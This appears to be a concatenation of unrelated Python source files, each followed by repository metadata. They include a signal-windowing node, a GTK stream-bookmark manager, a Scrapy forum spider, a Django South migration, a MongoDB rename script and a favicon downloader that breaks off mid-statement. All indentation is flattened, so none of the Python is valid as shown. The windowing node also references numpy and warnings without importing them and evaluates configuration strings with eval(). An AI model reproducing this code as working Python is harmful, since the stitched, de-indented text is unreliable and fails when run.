# Kept here local for debugging and because the file is just used in this node.
# Maybe this will change.
try:
import os
import yaml
import pySPACE
except:
pass
from pySPACE.missions.nodes.base_node import BaseNode
from pySPACE.resources.data_types.time_series import TimeSeries
class InvalidWindowException(Exception):
pass
class WindowFuncNode(BaseNode):
""" Multiply the :class:`~pySPACE.resources.data_types.time_series.TimeSeries` with a window
If the window has trailing zeros, the time series is chopped.
**Parameters**
:window_function_str:
This string has to be either the name of a function specified in
functions.yaml or a lambda expression that evaluates to a valid
window function. Such a window function has to be of the form
lambda n: lambda x: something
where n is the number of samples (the length of the window
function) and x is the respective value.
:reduce_window:
If True, zeros at the beginning or ending are chopped.
(*optional, default: False*)
**Exemplary call**
.. code-block:: yaml
-
node : Windowing
parameters :
window_function_str : "hanning" # loaded from functions.yaml
:Author: Jan Hendrik Metzen ([email protected])
:Created: 2008/09/01
:Revised: 2009/09/15 (Mario Krell)
"""
def __init__(self, window_function_str, reduce_window = False, **kwargs):
super(WindowFuncNode, self).__init__(**kwargs)
# Do the import of the abbreviations of the functions.
if not window_function_str.startswith("lambda"):
try:
functions_file = open(os.path.join(pySPACE.configuration.spec_dir,
'functions.yaml'), 'r')
functions = yaml.load(functions_file)
functions_file.close()
except AttributeError:
# Running outside of pySPACE, not able to load functions from YAML file
# TODO: Fix that
functions = {}
warnings.warn("Function in spec folder could not be loaded. Please fix that!")
try:
window_function_str = functions[window_function_str]
except KeyError:
# window_function_str is not the key for a function in functions.yaml,
# we assume that it is the window function itself
pass
self.set_permanent_attributes(window_function_str = window_function_str,
reduce_window = reduce_window,
num_of_samples = None,
window_array = None)
def create_window_array(self):
""" Create a permanent array for the windowing of the data"""
# the window is given as a lambda expression where the first variable
# is the length of the window (num of samples of the data) and the
# second one is for the time axis
# resolve first variable
window_function = eval(self.window_function_str)(self.num_of_samples)
# resolve second variable for final window creation
self.window_array = numpy.array([window_function(i) for i in \
range(self.num_of_samples)])
# Check if there are zeros at the beginning or end of window
# If yes, skip these ranges (i.e. shorten the time series window)
self.window_not_equal_zero = numpy.where(self.window_array != 0)[0]
self.window_has_zeros = (len(self.window_not_equal_zero) != \
self.num_of_samples)
# A window with only zeros does not make sense
if len(self.window_not_equal_zero) == 0:
raise InvalidWindowException("The window does contain only zeros!")
def _execute(self, data):
""" Apply the windowing to the given data and return the result """
#Create a window of the correct length for the given data
if self.num_of_samples is None:
self.num_of_samples = data.shape[0]
self.create_window_array()
data_array=data.view(numpy.ndarray)
#Do the actual windowing
# TODO: check if windowed_data = (self.window_array.T * data) works also???
windowed_data = (self.window_array * data_array.T).T
# Skip trailing zeros
if self.window_has_zeros and self.reduce_window:
windowed_data = windowed_data[
range(self.window_not_equal_zero[0],
self.window_not_equal_zero[-1] + 1), :]
result_time_series = TimeSeries.replace_data(data, windowed_data)
# Adjust start and end time when chopping was done
result_time_series.start_time = data.start_time + \
self.window_not_equal_zero[0] * 1000.0 / data.sampling_frequency
result_time_series.end_time = \
data.end_time - (data.shape[0] - self.window_not_equal_zero[-1]
- 1) * 1000.0 / data.sampling_frequency
else:
result_time_series = TimeSeries.replace_data(data, windowed_data)
return result_time_series
class ScaleNode(BaseNode):
""" Scale all value by a constant factor
Scales (i.e. multiplies) all values with a given factor.
**Parameters**
:factor:
The factor
**Exemplary Call**
.. code-block:: yaml
-
node : Scale
parameters :
factor : 2
:Authors: Hendrik Woehrle ([email protected])
:Created: 2013/03/08
"""
def __init__(self,
factor=1,
**kwargs):
super(ScaleNode, self).__init__(**kwargs)
if type(factor) == str:
factor = eval(factor)
self.set_permanent_attributes(factor=factor)
def _execute(self, data):
"""
Apply the scaling to the given data x
and return a new time series.
"""
x = data.view(numpy.ndarray).astype(numpy.double)
x = x * self.factor
result_time_series = TimeSeries.replace_data(data, x)
return result_time_series
_NODE_MAPPING = {"Windowing": WindowFuncNode,
} | pyspace/test | pySPACE/missions/nodes/preprocessing/window_func.py | Python | gpl-3.0 | 6,789 |
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk, Gdk
from os import path, makedirs
import re
import traceback
from subprocess import Popen, PIPE, DEVNULL
from station import Station
from constants import RE_URL
from tools import get_metadata, get_next_url
from drag import drag
from db import DataBase
from commands import CommandsMenu
class MainWindow:
def __init__(self, application):
self.application = application
self.edit = False
self.filter = False
self.locked = True
self.builder = Gtk.Builder()
glade_path = "{}/streams.glade".format(path.dirname(__file__))
self.builder.add_from_file(glade_path)
self.window = self.builder.get_object("main_win")
self.window.set_wmclass("Streams", "Streams")
self.window.set_title("Streams")
self.window.connect("delete-event", self.exit)
menu_com = self.builder.get_object("menu_command")
self.commands_menu = CommandsMenu(self)
menu_com.set_popup(self.commands_menu)
events = {
"on_selection_change": self.on_selection_change,
"on_activation": self.on_activation,
"on_add_clicked": self.on_add_clicked,
"on_edit_clicked": self.on_edit,
"on_delete_clicked": self.on_delete,
"on_save_clicked": self.on_save,
"on_cancel_clicked": self.on_cancel,
"on_dig_clicked": self.on_dig,
"on_auto_clicked": self.on_autofill,
"on_url_change": self.dig_button_state,
"on_web_change": self.web_button_state,
"on_web_clicked": self.visit_web,
"on_menuchoice_save_activate": self.commands_menu.add,
"on_menuchoice_delete_activate": self.commands_menu.delete,
"on_command_menu_activated": self.commands_menu.activated,
"on_menu_item_export_activate": self.on_export,
"on_menu_item_addurl_activate": self.add_url,
"on_menu_item_addfold_activate": self.add_folder,
"on_menu_item_openfile_activate": self.add_file,
"on_menu_item_export_folder_activate": self.on_export_folder,
"on_entry_filter_changed": self.filter_change,
"on_view_bookmarks_drag_drop": self.on_drag_drop,
"on_menu_item_filter_list_toggled": self.filter_toggle
}
self.builder.connect_signals(events)
self.db = DataBase(str, str, str, str, str, str, str, bool, int)
self.db.load()
self.tree_filter = self.db.filter_new(None)
self.entry_filter = self.builder.get_object("entry_filter")
self.tree_filter.set_visible_func(self.filter_func)
self.treeview = self.builder.get_object("view_bookmarks")
self.treeview.set_model(self.tree_filter)
self.treeview.enable_model_drag_source(Gdk.ModifierType.BUTTON1_MASK,
[("list_row", Gtk.TargetFlags.SAME_WIDGET, 0)],
Gdk.DragAction.MOVE)
self.treeview.enable_model_drag_dest([("list_row", Gtk.TargetFlags.SAME_WIDGET, 0)],
Gdk.DragAction.MOVE)
self.selection = self.builder.get_object("bookmarks_view_selection")
self.restore_state()
self.window.set_application(application)
self.window.show_all()
self.locked = False
def open(self, files):
for f in files:
scheme = f.get_uri_scheme()
location = f.get_parse_name()
if scheme == "http" or scheme == "https":
self.create_station(location)
elif scheme == "file":
self.add_from_file(location)
else:
self.popup("couldn't determine if file or url.")
def on_selection_change(self, selection):
model, treeiter = selection.get_selected()
grid = self.builder.get_object("info_grid")
actions = self.builder.get_object("box_actions")
edit = self.builder.get_object("box_edit")
if treeiter is None:
grid.set_visible(False)
actions.set_visible(False)
edit.set_visible(False)
else:
grid.set_visible(True)
actions.set_visible(True)
self.edit_mode(False)
self.load_selection_data()
return
def filter_change(self, entry):
self.tree_filter.refilter()
def filter_toggle(self, item):
self.filter = item.get_active()
self.entry_filter.set_visible(self.filter)
if self.filter:
self.entry_filter.grab_focus()
self.tree_filter.refilter()
def filter_func(self, model, treeiter, data):
row = model.get(treeiter, 0, 2, 7)
match = self.entry_filter.get_text()
title = row[0]
genres = row[1]
folder = row[2]
if row[0] is None:
return False
if re.search(match, title, re.IGNORECASE)\
or (genres is not None and re.search(match, genres, re.IGNORECASE)) \
or folder \
or not self.filter:
return True
else:
return False
def on_activation(self, text, path, column):
if self.tree_filter[path][7]:
return
url = self.tree_filter[path][1]
cmd = text.get_text().format(url)
cmd = cmd.split(" ", 1)
try:
Popen([cmd[0], cmd[1]],
shell=False,
stdout=PIPE,
stderr=DEVNULL)
except Exception as err:
traceback.print_exc()
self.popup(err)
return
def on_add_clicked(self, button):
choice_dial = Gtk.MessageDialog(self.window,
Gtk.DialogFlags.MODAL | Gtk.DialogFlags.DESTROY_WITH_PARENT,
Gtk.MessageType.QUESTION,
("Station", 1, "Folder", 2),
"Do you want to add a station or a folder ?")
choice_dial.set_default_response(1)
choice = choice_dial.run()
choice_dial.destroy()
if choice == 1:
self.add_url()
elif choice == 2:
self.add_folder()
return
def add_url(self, widget=None):
dialog = Gtk.MessageDialog(self.window,
Gtk.DialogFlags.MODAL | Gtk.DialogFlags.DESTROY_WITH_PARENT,
Gtk.MessageType.QUESTION,
Gtk.ButtonsType.OK_CANCEL,
"Enter the new station's URL"
)
text_new_url = Gtk.Entry(input_purpose=Gtk.InputPurpose.URL)
text_new_url.set_activates_default(Gtk.ResponseType.OK)
dialog.set_default_response(Gtk.ResponseType.OK)
area = dialog.get_content_area()
area.add(text_new_url)
text_new_url.show()
new_url = ""
response = dialog.run()
if response == Gtk.ResponseType.OK:
new_url = text_new_url.get_text()
dialog.destroy()
if RE_URL.match(new_url):
self.create_station(new_url)
else:
self.popup("Invalid URL")
return
def add_file(self, widget=None):
dial = Gtk.FileChooserDialog("Choose file to open",
self.window,
Gtk.FileChooserAction.OPEN,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
Gtk.STOCK_OPEN, Gtk.ResponseType.OK
))
filt = Gtk.FileFilter()
filt.set_name("Playlists")
filt.add_pattern("*.pls")
filt.add_pattern("*.m3u")
filt.add_pattern("*.xspf")
dial.add_filter(filt)
filt = Gtk.FileFilter()
filt.set_name("All")
filt.add_pattern("*")
dial.add_filter(filt)
response = dial.run()
file = dial.get_filename()
dial.destroy()
if response == Gtk.ResponseType.OK:
self.add_from_file(file)
def add_from_file(self, location):
if self.locked:
print("Locked")
return
self.locked = True
self.application.mark_busy()
win_wait = self.pls_wait()
while Gtk.events_pending():
Gtk.main_iteration()
try:
Station(self, location, None, True)
except Exception as err:
traceback.print_exc()
win_wait.destroy()
self.popup(err)
self.locked = False
self.application.unmark_busy()
else:
win_wait.destroy()
self.db.save()
self.locked = False
self.application.unmark_busy()
return
def add_folder(self, widget=None):
dialog = Gtk.MessageDialog(self.window,
Gtk.DialogFlags.MODAL | Gtk.DialogFlags.DESTROY_WITH_PARENT,
Gtk.MessageType.QUESTION,
Gtk.ButtonsType.OK_CANCEL,
"Enter the new folder's name"
)
text_fold = Gtk.Entry()
text_fold.set_activates_default(Gtk.ResponseType.OK)
text_fold.show()
area = dialog.get_content_area()
area.add(text_fold)
fol_name = ""
response = dialog.run()
if response == Gtk.ResponseType.OK:
fol_name = text_fold.get_text()
dialog.destroy()
if fol_name != "":
self.db.add_folder(fol_name)
self.db.save()
return
def create_station(self, url, parent=None):
if self.locked:
print("Locked")
return
self.application.mark_busy()
self.locked = True
win_wait = self.pls_wait()
while Gtk.events_pending():
Gtk.main_iteration()
try:
Station(self, url, parent)
except Exception as err:
traceback.print_exc()
win_wait.destroy()
self.popup(err)
self.locked = False
self.application.unmark_busy()
else:
self.db.save()
win_wait.destroy()
self.locked = False
self.application.unmark_busy()
return
def on_edit(self, button):
self.edit_mode(True)
return
def on_delete(self, text):
name = text.get_text()
dialog = Gtk.MessageDialog(self.window,
Gtk.DialogFlags.MODAL | Gtk.DialogFlags.DESTROY_WITH_PARENT,
Gtk.MessageType.QUESTION,
Gtk.ButtonsType.OK_CANCEL,
"Delete {} ?".format(name))
dialog.set_default_response(Gtk.ResponseType.OK)
response = dialog.run()
dialog.destroy()
if response != Gtk.ResponseType.OK:
return
f_row = self.selection.get_selected()[1]
db_row = self.tree_filter.convert_iter_to_child_iter(f_row)
self.db.remove(db_row)
self.db.save()
return
def on_save(self, button):
row = self.selection.get_selected()[1]
if row is None:
return
name = self.builder.get_object("text_name").get_text()
url = self.builder.get_object("text_url").get_text()
genres = self.builder.get_object("text_genres").get_text()
web = self.builder.get_object("text_web").get_text()
codec = self.builder.get_object("text_codec").get_text()
bitrate = self.builder.get_object("text_bitrate").get_text()
sample = self.builder.get_object("text_sample").get_text()
if name == "":
name = url
self.tree_filter.set_value(row, 0, name)
self.tree_filter.set_value(row, 1, url)
self.tree_filter.set_value(row, 2, genres)
self.tree_filter.set_value(row, 3, web)
self.tree_filter.set_value(row, 4, codec)
self.tree_filter.set_value(row, 5, bitrate)
self.tree_filter.set_value(row, 6, sample)
self.db.save()
self.edit_mode(False)
return
def on_cancel(self, button):
self.edit_mode(False)
self.load_selection_data()
return
def on_dig(self, text):
url = text.get_text()
try:
new_url = get_next_url(self, url)
except Exception as err:
traceback.print_exc()
self.popup(err)
return
if type(new_url) is str:
text.set_text(new_url)
elif type(new_url) is tuple:
if len(new_url[1]) == 1:
text.set_text(new_url[1][0])
else:
if new_url[0] is not None:
parent = self.db.add_folder(new_url[0])
else:
parent = None
for url in new_url[1]:
self.create_station(url, parent)
self.edit_mode(False)
self.load_selection_data()
self.popup("Multiple stations added,\nsource station has not been changed")
return
def on_autofill(self, text):
self.application.mark_busy()
self.locked = True
win_wait = self.pls_wait()
while Gtk.events_pending():
Gtk.main_iteration()
url = text.get_text()
try:
data = get_metadata(url)
except Exception as err:
traceback.print_exc()
win_wait.destroy()
self.application.unmark_busy()
self.locked = False
self.popup(err)
else:
self.builder.get_object("text_name").set_text(data[0])
self.builder.get_object("text_url").set_text(url)
self.builder.get_object("text_genres").set_text(data[2])
self.builder.get_object("text_web").set_text(data[3])
self.builder.get_object("text_codec").set_text(data[4])
self.builder.get_object("text_bitrate").set_text(data[5])
self.builder.get_object("text_sample").set_text(data[6])
win_wait.destroy()
self.locked = False
self.application.unmark_busy()
return
def edit_mode(self, state):
self.edit = state
model, iter = self.selection.get_selected()
button_auto = self.builder.get_object("button_auto")
button_auto.set_sensitive(not model[iter][7])
self.builder.get_object("box_edit").set_visible(state)
self.builder.get_object("box_actions").set_visible(not state)
self.builder.get_object("text_name").set_editable(state)
self.builder.get_object("text_url").set_editable(state)
self.builder.get_object("text_genres").set_editable(state)
self.builder.get_object("text_web").set_editable(state)
self.builder.get_object("text_codec").set_editable(state)
self.builder.get_object("text_bitrate").set_editable(state)
self.builder.get_object("text_sample").set_editable(state)
entry = self.builder.get_object("text_url")
self.dig_button_state(entry)
return
def dig_button_state(self, entry):
row, cursor = self.selection.get_selected()
state = self.edit and not row[cursor][7]
if state:
self.builder.get_object("info_grid").child_set_property(entry, "width", 1)
else:
self.builder.get_object("info_grid").child_set_property(entry, "width", 2)
self.builder.get_object("button_dig").set_visible(state)
return
def web_button_state(self, entry):
url = entry.get_text()
state = RE_URL.match(url)
if state is None:
state = False
if state:
self.builder.get_object("info_grid").child_set_property(entry, "width", 1)
else:
self.builder.get_object("info_grid").child_set_property(entry, "width", 2)
self.builder.get_object("button_web").set_visible(state)
return
@staticmethod
def visit_web(text):
url = text.get_text()
Popen(["xdg-open", url],
shell=False,
stdout=PIPE,
stderr=DEVNULL)
return
def load_selection_data(self):
model, treeiter = self.selection.get_selected()
if treeiter is None:
return
text_name = self.builder.get_object("text_name")
# text_label = self.builder.get_object("label_name")
text_url = self.builder.get_object("text_url")
label_url = self.builder.get_object("label_url")
text_genres = self.builder.get_object("text_genres")
label_genres = self.builder.get_object("label_genres")
text_web = self.builder.get_object("text_web")
label_web = self.builder.get_object("label_web")
text_codec = self.builder.get_object("text_codec")
label_codec = self.builder.get_object("label_codec")
text_bitrate = self.builder.get_object("text_bitrate")
label_bitrate = self.builder.get_object("label_bitrate")
text_sample = self.builder.get_object("text_sample")
label_sample = self.builder.get_object("label_sample")
button_dig = self.builder.get_object("button_dig")
button_web = self.builder.get_object("button_web")
name = model[treeiter][0]
text_name.set_text(name)
visible = not model[treeiter][7]
text_url.set_visible(visible)
label_url.set_visible(visible)
text_genres.set_visible(visible)
label_genres.set_visible(visible)
text_web.set_visible(visible)
label_web.set_visible(visible)
text_codec.set_visible(visible)
label_codec.set_visible(visible)
text_bitrate.set_visible(visible)
label_bitrate.set_visible(visible)
text_sample.set_visible(visible)
label_sample.set_visible(visible)
button_dig.set_visible(visible)
button_web.set_visible(visible)
export_folder_menu = self.builder.get_object("menu_item_export_folder")
if not model[treeiter][7]:
url = model[treeiter][1]
genres = model[treeiter][2]
web = model[treeiter][3]
codec = model[treeiter][4]
bitrate = model[treeiter][5]
sample = model[treeiter][6]
export_folder_menu.set_sensitive(False)
else:
url = ""
genres = ""
web = ""
codec = ""
bitrate = ""
sample = ""
export_folder_menu.set_sensitive(True)
text_url.set_text(url)
text_genres.set_text(genres)
text_web.set_text(web)
text_codec.set_text(codec)
text_bitrate.set_text(bitrate)
text_sample.set_text(sample)
return
def exit(self, a, b):
self.write_state()
return
def write_state(self):
x = self.window.get_size()[0]
y = self.window.get_size()[1]
pane = self.builder.get_object("panel").get_property("position")
maximised = self.window.is_maximized()
cmd = self.builder.get_object("text_command").get_text()
cache_file = path.expanduser("~/.cache/streams/streams")
if not path.exists(path.dirname(cache_file)):
makedirs(path.dirname(cache_file))
file = open(cache_file, 'w')
file.write("{}\n".format(str(x)))
file.write("{}\n".format(str(y)))
file.write("{}\n".format(str(pane)))
file.write("{}\n".format(str(maximised)))
file.write("{}\n".format(str(cmd)))
file.close()
return
def restore_state(self):
cache_file = path.expanduser("~/.cache/streams/streams")
if not path.exists(cache_file):
return
file = open(cache_file, 'r')
x = int(file.readline())
y = int(file.readline())
pane = int(file.readline())
maxi = file.readline()
cmd = file.readline()
file.close()
self.window.resize(x, y)
self.builder.get_object("panel").set_position(pane)
if maxi == "True":
self.window.maximize()
self.builder.get_object("text_command").set_text(cmd[:-1])
return
def popup(self, err, msg_type=Gtk.MessageType.ERROR):
dialog = Gtk.MessageDialog(self.window,
(Gtk.DialogFlags.MODAL|Gtk.DialogFlags.DESTROY_WITH_PARENT),
msg_type,
Gtk.ButtonsType.CLOSE,
err)
dialog.set_default_response(Gtk.ResponseType.CLOSE)
dialog.run()
dialog.destroy()
return
def pls_wait(self):
win = Gtk.Window()
win.set_default_size(100, 50)
win.set_transient_for(self.window)
win.set_modal(True)
win.set_position(Gtk.WindowPosition.CENTER_ON_PARENT)
win.set_decorated(False)
text = Gtk.Label("Please wait...")
win.add(text)
text.show()
win.show_now()
return win
def on_drag_drop(self, treeview, context, x, y, time):
treeview.stop_emission("drag_drop")
selec = treeview.get_selection()
model, treeiter = selec.get_selected()
data = []
for d in model[treeiter]:
data.append(d)
drop_info = treeview.get_dest_row_at_pos(x, y)
src_iter = self.tree_filter.convert_iter_to_child_iter(treeiter)
drag(data, drop_info, self.db, model, src_iter)
context.finish(True, True, time)
self.db.save()
return
def pl_file_selecter(self):
dial = Gtk.FileChooserDialog("Choose destination file",
self.window,
Gtk.FileChooserAction.SAVE,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
Gtk.STOCK_SAVE, Gtk.ResponseType.OK
))
filt = Gtk.FileFilter()
filt.set_name("pls")
filt.add_pattern("*.pls")
dial.add_filter(filt)
filt = Gtk.FileFilter()
filt.set_name("m3u")
filt.add_pattern("*.m3u")
dial.add_filter(filt)
response = dial.run()
file = dial.get_filename()
ext = dial.get_filter().get_name()
dial.destroy()
if response == Gtk.ResponseType.OK:
file_ext = file.split(".")[-1]
if file_ext.lower() != ext:
file = "{}.{}".format(file, ext)
if path.isfile(file):
dial = Gtk.MessageDialog(self.window,
Gtk.DialogFlags.MODAL | Gtk.DialogFlags.DESTROY_WITH_PARENT,
Gtk.MessageType.QUESTION,
Gtk.ButtonsType.OK_CANCEL,
"{}\n\nFile already exists, overwrite ?".format(file)
)
response = dial.run()
dial.destroy()
if response != Gtk.ResponseType.OK:
return None
return file
def on_export(self, menu_item):
file = self.pl_file_selecter()
self.db.export(file)
return
def on_export_folder(self, menu_item):
file = self.pl_file_selecter()
treeiter = self.selection.get_selected()[1]
f_path = self.tree_filter.get_path(treeiter)
db_path = self.tree_filter.convert_path_to_child_path(f_path)
self.db.export(file, db_path)
return
| Llamatron2112/streams | mainwindow.py | Python | gpl-3.0 | 24,045 |
from flask import Flask
app = Flask(__name__)
from app import vizarvin
| arvinsahni/ml4 | flask/app/__init__.py | Python | mit | 73 |
# -*- coding: utf-8 -*-
import scrapy
from topsage.items import ComputerItem
class ComputerSpider(scrapy.Spider):
name = "computer"
allowed_domains = ["club.topsage.com"]
start_urls = (
'http://club.topsage.com/forum-49-1.html',
)
def parse(self, response):
for path in response.xpath('//*[contains(@id, "forum_")]/table//td/h2/a/@href').extract():
yield scrapy.Request(response.urljoin(path), self.parse_list)
def parse_list(self, response):
next_path = response.xpath('//*[@id="fd_page_bottom"]//a[@class="nxt"]/@href').extract_first()
if next_path is not None:
yield scrapy.Request(response.urljoin(next_path), self.parse_list)
for path in response.xpath('//table[@id="threadlisttableid"]/tbody/tr/th/a[contains(@href, "topsage")]/@href').extract():
yield scrapy.Request(response.urljoin(path), self.parse_post)
def parse_post(self, response):
post_title = response.xpath('//*[@id="thread_subject"]/a/text()').extract_first()
for a_dom in response.xpath('//div[@class="pct"]//a'):
yield ComputerItem(post_url=response.url, post_title=post_title,
url=a_dom.xpath('@href').extract_first(),
name=a_dom.xpath('text()').extract_first())
| JayvicWen/Crawler | topsage/topsage/spiders/computer.py | Python | mit | 1,305 |
from datetime import datetime
from dateutil.relativedelta import relativedelta
class GithubDatePoints(object):
MAX_HEIGHT = 7
MAX_WIDTH = 51
def __init__(self, pixel_set):
self.__pixel_set = self.__normalize_pixel_set(pixel_set)
self.__datetime_start_point = self.get_datetime_start_point()
def __normalize_pixel_set(self, pixel_set):
size = min(len(pixel_set), self.MAX_HEIGHT)
pixel_set = pixel_set[:size]
for i in range(size):
pixel_set[i] = pixel_set[i][:self.MAX_WIDTH]
return pixel_set
def get_datetime_start_point(self):
date_point = datetime.today()
date_point = date_point + relativedelta(weeks=1)
weekday = date_point.weekday()
if weekday != 6:
date_point = date_point - relativedelta(days=weekday, years=1)
return date_point
def get_date_points(self):
dates = []
for rows in range(len(self.__pixel_set)):
for col in range(len(self.__pixel_set[rows])):
if self.__pixel_set[rows][col] != 0:
dates.append(self.__datetime_start_point +
relativedelta(weeks=col, days=rows))
return dates
| ufocoder/py-GithubArt | github_art/datepoints.py | Python | mit | 1,247 |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'FederalBudget.subvention_performance'
db.alter_column(u'mo_federalbudget', 'subvention_performance', self.gf('django.db.models.fields.IntegerField')())
# Adding field 'DepartamentAgreement.start_year'
db.add_column(u'mo_departamentagreement', 'start_year',
self.gf('django.db.models.fields.DateField')(default=datetime.datetime(2014, 2, 13, 0, 0), blank=True),
keep_default=False)
# Adding field 'DepartamentAgreement.finish_year'
db.add_column(u'mo_departamentagreement', 'finish_year',
self.gf('django.db.models.fields.DateField')(default=datetime.datetime(2014, 2, 13, 0, 0), blank=True),
keep_default=False)
# Changing field 'RegionalBudget.subvention_performance'
db.alter_column(u'mo_regionalbudget', 'subvention_performance', self.gf('django.db.models.fields.IntegerField')())
def backwards(self, orm):
# Changing field 'FederalBudget.subvention_performance'
db.alter_column(u'mo_federalbudget', 'subvention_performance', self.gf('django.db.models.fields.IntegerField')(null=True))
# Deleting field 'DepartamentAgreement.start_year'
db.delete_column(u'mo_departamentagreement', 'start_year')
# Deleting field 'DepartamentAgreement.finish_year'
db.delete_column(u'mo_departamentagreement', 'finish_year')
# Changing field 'RegionalBudget.subvention_performance'
db.alter_column(u'mo_regionalbudget', 'subvention_performance', self.gf('django.db.models.fields.IntegerField')(null=True))
models = {
'mo.departamentagreement': {
'Meta': {'object_name': 'DepartamentAgreement'},
'agreement_type': ('django.db.models.fields.SmallIntegerField', [], {'default': '0', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'finish_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2014, 2, 13, 0, 0)', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.MO']", 'null': 'True', 'blank': 'True'}),
'num': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2014, 2, 13, 0, 0)', 'blank': 'True'}),
'subvention': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.Subvention']", 'null': 'True', 'blank': 'True'})
},
'mo.federalbudget': {
'Meta': {'object_name': 'FederalBudget'},
'adm_coef': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sub_orph_home': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'sub_sum': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'subvention_performance': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
'mo.mo': {
'Meta': {'object_name': 'MO'},
'common_amount': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'common_economy': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'common_percentage': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'common_spent': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'creation_form': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '24', 'null': 'True', 'blank': 'True'}),
'has_trouble': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'home_orphans': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2048'})
},
'mo.orphan': {
'Meta': {'object_name': 'Orphan'},
'age': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'have_home': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_privilege': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'})
},
'mo.peopleamount': {
'Meta': {'object_name': 'PeopleAmount'},
'deals': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'future_queue_by_list': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'future_unhome_orphan': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'future_unhome_orphan_14_18': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.MO']", 'null': 'True', 'blank': 'True'}),
'privilege_people': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'queue_by_list': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'recoverers': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'unhome_orphan': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'unhome_orphan_14_18': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'mo.regionalbudget': {
'Meta': {'object_name': 'RegionalBudget'},
'adm_coef': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sub_orph_home': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'sub_sum': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'subvention_performance': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
'mo.subvention': {
'Meta': {'object_name': 'Subvention'},
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'blank': 'True'}),
'fed_budget': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.FederalBudget']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'reg_budget': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.RegionalBudget']", 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['mo'] | zionist/mon | mon/apps/mo/migrations/0009_auto__chg_field_federalbudget_subvention_performance__add_field_depart.py | Python | bsd-3-clause | 7,925 |
#Modifies the Stage_client_stats collection of Stage_database.
#Changes the client_ts field to ts.
from pymongo import MongoClient
client = MongoClient()
db = client.Stage_database
collection = db.Stage_client_stats
collection.update({}, { '$rename': {"client_ts": "ts"}}, multi=True)
collection = db.Stage_server_stats
collection.update({}, { '$rename': {"client_ts": "ts"}}, multi=True)
collection = db.Stage_result_stats
collection.update({}, { '$rename': {"client_ts": "ts"}}, multi=True)
| joshzarrabi/e-mission-server | bin/historical/migrations/rename_client_ts_to_ts.py | Python | bsd-3-clause | 499 |
#!python3
"""
This script downloads the favicons
Usage:
python3 update_alexa path/to/data.csv
"""
import os
import requests
favicon_path = os.path.join(os.path.dirname(__file__), "..", "icons")
def download_favicons(links):
for link in links:
netloc = link['netloc']
url = 'http://' + netloc
new_favicon_path = os.path.join(favicon_path, netloc + ".ico")
if not os.path.exists(new_favicon_path):
try:
print(url)
response = requests.get(
"https://realfavicongenerator.p.rapidapi.com/favicon/icon",
params={'platform': 'desktop', "site": url},
headers={'X-Mashape-Key': os.environ.get("mashape_key")}
)
except:
pass
else:
if response:
with open(new_favicon_path, 'wb') as f:
